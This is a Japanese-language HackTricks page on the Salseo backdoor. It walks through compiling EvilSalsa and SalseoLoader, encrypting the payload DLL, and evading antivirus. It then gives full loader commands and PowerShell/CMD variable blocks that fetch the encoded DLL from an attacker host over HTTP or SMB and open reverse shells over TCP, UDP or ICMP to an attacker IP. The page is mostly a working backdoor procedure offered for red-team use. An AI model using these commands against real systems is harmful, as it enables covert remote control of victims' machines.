Salseo

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricks をサポートする他の方法:

バイナリのコンパイル

GitHub からソースコードをダウンロードし、EvilSalsaSalseoLoader をコンパイルします。コードをコンパイルするには Visual Studio が必要です。

これらのプロジェクトを、使用するWindowsボックスのアーキテクチャ用にコンパイルします(Windowsがx64をサポートしている場合は、そのアーキテクチャ用にコンパイルします)。

Visual Studio内で、"Platform Target"左側の "Build" タブ でアーキテクチャを選択できます。

(**このオプションが見つからない場合は、"Project Tab" を押し、次に " Properties" をクリックします)

その後、両方のプロジェクトをビルドします(Build -> Build Solution)(ログ内に実行可能ファイルのパスが表示されます):

バックドアの準備

まず、EvilSalsa.dll をエンコードする必要があります。これを行うには、pythonスクリプト encrypterassembly.py を使用するか、プロジェクト EncrypterAssembly をコンパイルできます:

Python

python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt

Windows

ウィンドウズ

EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt

Ok, 今、Salseoのすべてを実行するために必要なものが揃いました: エンコードされたEvilDalsa.dllSalseoLoaderのバイナリ

SalseoLoader.exeバイナリをマシンにアップロードしてください。どのAVにも検出されないようにしてください...

バックドアを実行する

TCPリバースシェルを取得する(HTTPを介してエンコードされたdllをダウンロードする)

リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたevilsalsaを提供することを忘れないでください。

SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

UDPリバースシェルを取得する(SMBを介してエンコードされたdllをダウンロードする)

リバースシェルリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバー(impacket-smbserver)を起動することを忘れないでください。

SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

ICMPリバースシェルを取得する(エンコードされたdllはすでに被害者の中にある)

今回は、リバースシェルを受信するためにクライアントに特別なツールが必要です。ダウンロード: https://github.com/inquisb/icmpsh

ICMP応答を無効にする:

sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

クライアントを実行する:

python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"

被害者の内部で、salseoの実行を許可します:

SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

DLLのエクスポートメイン関数としてSalseoLoaderをコンパイルする

Visual Studioを使用してSalseoLoaderプロジェクトを開きます。

メイン関数の前に追加: [DllExport]

このプロジェクトにDllExportをインストール

ツール --> NuGet パッケージ マネージャー --> ソリューションの NuGet パッケージを管理...

DllExport パッケージを検索 (Browse タブを使用) し、インストールを押して (ポップアップを受け入れる)

プロジェクトフォルダに DllExport.batDllExport_Configure.bat というファイルが表示されます

DllExport をアンインストール

アンインストール を押します (はい、奇妙ですが、信じてください、必要です)

Visual Studio を終了して DllExport_configure を実行

単に Visual Studio を 終了 します

その後、SalseoLoader フォルダに移動して DllExport_Configure.bat を実行します

x64 を選択します (x64 ボックス内で使用する場合、私の場合はそうでした)、System.Runtime.InteropServices (DllExport の Namespace 内) を選択して Apply を押します

プロジェクトを再度 Visual Studio で開く

[DllExport] はもはやエラーとしてマークされていません

ソリューションをビルド

Output Type = Class Library を選択します (プロジェクト --> SalseoLoader プロパティ --> アプリケーション --> Output type = Class Library)

x64 プラットフォーム を選択します (プロジェクト --> SalseoLoader プロパティ --> ビルド --> Platform target = x64)

ソリューションを ビルド するには: Build --> Build Solution (Output コンソール内に新しい DLL のパスが表示されます)

生成された DLL をテスト

DLL をテストしたい場所にコピーして貼り付けます。

実行:

rundll32.exe SalseoLoader.dll,main

エラーが表示されない場合は、おそらく機能するDLLを持っています!!

DLLを使用してシェルを取得する

HTTP サーバーを使用して、nc リスナーを設定することを忘れないでください

Powershell

$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

CMD

set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
AWSハッキングをゼロからヒーローまで学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

Last updated